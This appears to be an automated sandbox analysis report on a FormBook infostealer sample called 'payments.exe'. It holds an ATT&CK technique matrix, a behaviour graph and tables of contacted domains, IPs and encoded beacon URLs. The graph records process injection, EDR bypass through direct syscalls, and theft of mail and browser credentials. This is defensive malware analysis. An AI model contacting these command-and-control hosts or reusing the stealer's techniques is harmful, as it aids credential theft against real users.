                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560289 Sample: payments.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 28 www.rtpterbaruwaktu3.xyz 2->28 30 www.54248711.xyz 2->30 32 16 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Yara detected FormBook 2->44 46 Binary is likely a compiled AutoIt script file 2->46 50 3 other signatures 2->50 10 payments.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 XhwUfLdILQipZF.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 pcaui.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 XhwUfLdILQipZF.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 rtpterbaruwaktu3.xyz 103.21.221.87, 49769, 80 LINKNET-ID-APLinknetASNID unknown 22->34 36 www.54248711.xyz 161.97.142.144, 50011, 50012, 50013 CONTABODE United States 22->36 38 13 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                payments.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.smartcongress.net/11t3/?bBw=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013w88VAS70Y9JS73ZjbBY8NXuVWXuwPQ==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.questmatch.pro/z3ox/0%Avira URL Cloudsafe
                http://www.rtpterbaruwaktu3.xyz/7yx4/?bBw=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQb1jyxz6bPKG1jNO+cUySHxdHc2K5rg==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.gogawithme.live/6gtt/?bBw=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbepy0TXn/sNBWKXnk+HntNHa0bIYL3g==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvd0%Avira URL Cloudsafe
                http://www.70kdd.top/klhq/?bBw=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ja3Sv08AkNNTw70A3KyR0Ra9u58Xeg==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.54248711.xyz/jm2l/?PBk=f4VDN8Bp14IhbV&bBw=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyg51Tr+0rPqFG3CUyYWI31hnfzG2FIQ==0%Avira URL Cloudsafe
                http://www.smartcongress.net/11t3/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxw0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click/6wln/0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/crrp/?bBw=upjfZKq4/ZGfoF/T3gRqvMsDposBEsbCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/gAtazJHp7Z7XNdyJQnSFd8YmyBfIfQ==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.ampsamkok88.shop/huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.ytsd88.top/egqi/?bBw=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8lot5wYlOl469WmdukWuN3NsqkmPJjQ==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.matteicapital.online/hyyd/?PBk=f4VDN8Bp14IhbV&bBw=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX3VjmPRmhRH/ifjHqvJrHFSE8BVe6vQ==0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/2pji/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP0%Avira URL Cloudsafe
                http://www.70kdd.top/klhq/0%Avira URL Cloudsafe
                http://www.bser101pp.buzz/crrp/0%Avira URL Cloudsafe
                http://www.acond-22-mvr.click/w9z4/100%Avira URL Cloudmalware
                http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimx0%Avira URL Cloudsafe
                http://www.llljjjiii.shop/rsvy/0%Avira URL Cloudsafe
                http://www.matteicapital.online/__media__/js/trademark.php?d=matteicapital.online&type=ns0%Avira URL Cloudsafe
                http://www.llljjjiii.shop/rsvy/?bBw=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rQpb0mRwFlkiYxCOBwbKBY/Wtalppug==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx0%Avira URL Cloudsafe
                http://www.ampsamkok88.shop/huvt/0%Avira URL Cloudsafe
                http://www.matteicapital.online/Angel_Investors.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1S0%Avira URL Cloudsafe
                http://www.3kw40881107247y.click0%Avira URL Cloudsafe
                http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.gogawithme.live/6gtt/0%Avira URL Cloudsafe
                http://www.ytsd88.top/egqi/0%Avira URL Cloudsafe
                http://www.Matteicapital.online0%Avira URL Cloudsafe
                http://www.canadavinreport.site/cvhb/0%Avira URL Cloudsafe
                http://www.questmatch.pro/z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhUirL/6ZuF4cRwiIE0+ehkyVFqeLMeg==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.mrpokrovskii.pro/2pji/?bBw=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT82t+6t4M73z602ZXRfzEt+UzcIaSeg==&PBk=f4VDN8Bp14IhbV0%Avira URL Cloudsafe
                http://www.54248711.xyz/jm2l/0%Avira URL Cloudsafe
                http://www.matteicapital.online/__media__/design/underconstructionnotice.php?d=matteicapital.online0%Avira URL Cloudsafe
                http://www.matteicapital.online/hyyd/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.llljjjiii.shop
                		8.210.114.150
                		truefalse
                  		unknown
                  www.ampsamkok88.shop
                  		172.67.209.48
                  		truefalse
                    		unknown
                    s-part-0035.t-0009.t-msedge.net
                    		13.107.246.63
                    		truefalse
                      		high
                      www.54248711.xyz
                      		161.97.142.144
                      		truetrue
                        		unknown
                        www.gogawithme.live
                        		209.74.77.109
                        		truefalse
                          		unknown
                          www.canadavinreport.site
                          		185.27.134.206
                          		truefalse
                            		unknown
                            www.3kw40881107247y.click
                            		172.67.192.207
                            		truefalse
                              		unknown
                              www.questmatch.pro
                              		104.21.62.184
                              		truefalse
                                		unknown
                                www.acond-22-mvr.click
                                		199.59.243.227
                                		truefalse
                                  		unknown
                                  www.mrpokrovskii.pro
                                  		194.85.61.76
                                  		truefalse
                                    		unknown
                                    smartcongress.net
                                    		146.88.233.115
                                    		truefalse
                                      		unknown
                                      www.matteicapital.online
                                      		208.91.197.27
                                      		truefalse
                                        		unknown
                                        70kdd.top
                                        		38.47.232.124
                                        		truefalse
                                          		unknown
                                          www.bser101pp.buzz
                                          		104.21.58.90
                                          		truefalse
                                            		unknown
                                            www.ytsd88.top
                                            		47.76.213.197
                                            		truefalse
                                              		unknown
                                              rtpterbaruwaktu3.xyz
                                              		103.21.221.87
                                              		truetrue
                                                		unknown
                                                www.70kdd.top
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.rtpterbaruwaktu3.xyz
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.smartcongress.net
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.3kw40881107247y.click/6wln/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.questmatch.pro/z3ox/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.54248711.xyz/jm2l/?PBk=f4VDN8Bp14IhbV&bBw=M21ir/NSFfGrmB4z/u+JMR/HgMrfgTX4RaXyCSFwSSwtaZs5yH0UEptpPba+9Px3pipv0aZDZRRy+Xo/jJmyg51Tr+0rPqFG3CUyYWI31hnfzG2FIQ==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.70kdd.top/klhq/?bBw=AHY/rhT5FAaHaOQwqTnzrcskZO2I+4brO2rEekNoUo4JX0G52JlH+4AuLBXgGUSDwTLgniL6s02sZcl+Gf8+ja3Sv08AkNNTw70A3KyR0Ra9u58Xeg==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.smartcongress.net/11t3/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rtpterbaruwaktu3.xyz/7yx4/?bBw=m5A4fx9ZIvMjycGMPfzrz9w2buYwlryi7dKiWry0Mz65334dxjvJlwP/oWrLHd67Yf3RW+voxQmVQwC1SSJQb1jyxz6bPKG1jNO+cUySHxdHc2K5rg==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gogawithme.live/6gtt/?bBw=SGA0vAB7ljjiJZBksJb1gqec1i3dMNjZK6uCbLTCC3HP5ur0cn6Abe6/hzp/g4dh4YOAUYGeqr6sPYYs6bnbepy0TXn/sNBWKXnk+HntNHa0bIYL3g==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.smartcongress.net/11t3/?bBw=BoXQYlgPFtFW2+QaEcN/9vg3Pg7HxeD9OGXhxFZv9pg5w5kxRGgY33EbCKURTw9NMXrcECQepab13HCWL013w88VAS70Y9JS73ZjbBY8NXuVWXuwPQ==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bser101pp.buzz/crrp/?bBw=upjfZKq4/ZGfoF/T3gRqvMsDposBEsbCPxdbSO05fQ4zSiP5+UGAxJqZOtAYqZWCOef+BeM6z+3JdRqWgtx/gAtazJHp7Z7XNdyJQnSFd8YmyBfIfQ==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ytsd88.top/egqi/?bBw=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8lot5wYlOl469WmdukWuN3NsqkmPJjQ==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ampsamkok88.shop/huvt/?bBw=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPcijKU85s4sBliMM2+p3cutSfMcIpXQ==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mrpokrovskii.pro/2pji/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.matteicapital.online/hyyd/?PBk=f4VDN8Bp14IhbV&bBw=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX3VjmPRmhRH/ifjHqvJrHFSE8BVe6vQ==false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.70kdd.top/klhq/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.bser101pp.buzz/crrp/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.acond-22-mvr.click/w9z4/false
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.llljjjiii.shop/rsvy/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.llljjjiii.shop/rsvy/?bBw=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rQpb0mRwFlkiYxCOBwbKBY/Wtalppug==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ampsamkok88.shop/huvt/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gogawithme.live/6gtt/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.ytsd88.top/egqi/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.questmatch.pro/z3ox/?bBw=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhUirL/6ZuF4cRwiIE0+ehkyVFqeLMeg==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSew4ovcqpU8EMNhqKZYp0bCjlC2qCkSQ==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.canadavinreport.site/cvhb/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mrpokrovskii.pro/2pji/?bBw=67iA4TPPdQ9nErotgeyL+Ya2EPxYwBsEvI1Cgt9ewFwChBdA65DXjWpTSdFtRBveCaF8GV/HBCb4pJoPY3YT82t+6t4M73z602ZXRfzEt+UzcIaSeg==&PBk=f4VDN8Bp14IhbVfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.54248711.xyz/jm2l/false
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.matteicapital.online/hyyd/false
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabpcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://dts.gnpge.comXhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://i3.cdn-image.com/__media__/pics/28903/search.png)pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.consentmanager.netpcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.matteicapital.online/Funds.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwvdpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.bt.cn/?from=404pcaui.exe, 00000004.00000002.3802641063.00000000057AE000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003DAE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.google.compcaui.exe, 00000004.00000002.3802641063.00000000052F8000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000038F8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.matteicapital.online/Capital.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxwpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchpcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.matteicapital.online/Home_Equity_Rates.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BPpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://delivery.consentmanager.netpcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i3.cdn-image.com/__media__/pics/29590/bg1.png)pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.matteicapital.online/Interest.cfm?fp=rc9%2BBG3aoUzorBCa6%2F7nT8%2F3WEhQ2jcM0%2BP1SZmvSimxpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)pcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.canadavinreport.site/cvhb/?bBw=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHxpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.000000000611A000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.000000000471A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixpcaui.exe, 00000004.00000002.3804776835.00000000072E0000.00000004.00000800.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3802641063.0000000005940000.00000004.10000000.00040000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.0000000003F40000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/pcaui.exe, 00000004.00000002.3804958379.000000000763E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
